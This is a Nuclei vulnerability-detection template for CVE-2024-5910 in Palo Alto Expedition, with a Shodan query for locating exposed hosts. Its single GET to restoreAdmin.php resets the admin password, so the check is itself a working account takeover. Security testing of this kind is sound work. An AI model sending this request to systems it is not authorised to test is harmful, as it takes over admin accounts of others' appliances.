43 lines
1.3 KiB
YAML
43 lines
1.3 KiB
YAML
id: CVE-2024-5910
|
|
|
|
info:
|
|
name: Palo Alto Expedition - Admin Account Takeover
|
|
author: johnk3r
|
|
severity: critical
|
|
description: |
|
|
Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
|
|
reference:
|
|
- https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise
|
|
- https://security.paloaltonetworks.com/CVE-2024-5910
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-5910
|
|
classification:
|
|
cve-id: CVE-2024-5910
|
|
cvss-score: 9.3
|
|
cwe-id: CWE-306
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.10397
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: paloaltonetworks
|
|
product: expedition
|
|
shodan-query: http.favicon.hash:1499876150
|
|
tags: cve,cve2024,palo-alto,auth-bypass
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/OS/startup/restore/restoreAdmin.php"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Admin user found"
|
|
- "Admin password restored"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100ae2af8d3f22acde5d02c660aec9cef1d74a0d99f0b3e920c76a31a3efadbf86a022100f1a5128a2ec167051d28fa1c8b018e8ce88fde39ec5efdaeaa4baf88b5422e87:922c64590222798bb761d5b6d8e72950 |